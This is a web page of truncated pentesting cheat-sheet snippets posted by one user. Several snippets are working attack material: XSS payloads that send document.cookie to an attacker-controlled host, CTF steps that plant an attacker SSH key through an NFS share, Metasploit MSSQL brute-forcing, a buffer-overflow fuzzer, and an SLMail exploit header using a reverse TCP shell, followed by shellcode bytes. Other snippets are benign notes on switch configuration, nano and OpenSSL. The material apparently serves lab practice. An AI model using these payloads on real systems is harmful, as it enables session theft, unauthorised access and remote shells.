Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:08:19

[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>...


Score: 0

By: ajayverma 2019-06-25 11:08:23

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config

Lists the comman...


Score: 0

Title: CTF Notes_1
By: ajayverma 2019-06-25 11:08:26

# Enumerate Users via Finger
finger user@192.168.0.20

# Show nfs shares available
showmount -e 192.168.1.54

# User nfspysh to mount share and create .ssh directory
nfspysh -o server=192.168.0.20:/home/user
mkdir .ssh
cd .ssh

# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys

# Transfer attacker public key to ho...


Score: 0

By: ajayverma 2019-06-25 11:08:30

[+] Main tasks:

Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of ...


Score: 0

By: ajayverma 2019-06-25 11:08:33

[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.

[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file

[+] Create a file and append text to it:
ifconfig > tmp
echo &g...


Score: 0

By: ajayverma 2019-06-25 11:08:36

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanne...


Score: 0


1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available crea...


Score: 0


#!/usr/bin/python
import socket

#create an array of buffers, while incrementing them

buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200

for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_S...


Score: 0


#!/usr/bin/env ruby

=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shitaka_ga_nai
=end

require 'socket'

#bad chars = "\x00\x0a\x0d"
#jmp esp addre...


Score: 0

By: ajayverma 2019-06-25 10:11:42

prefix = "\\x41" * 80
eip = "\\x42" * 4
nop = "\\x90" * (400 - 137)
buf = ""
buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31"
buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68"
buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\x...


Score: 0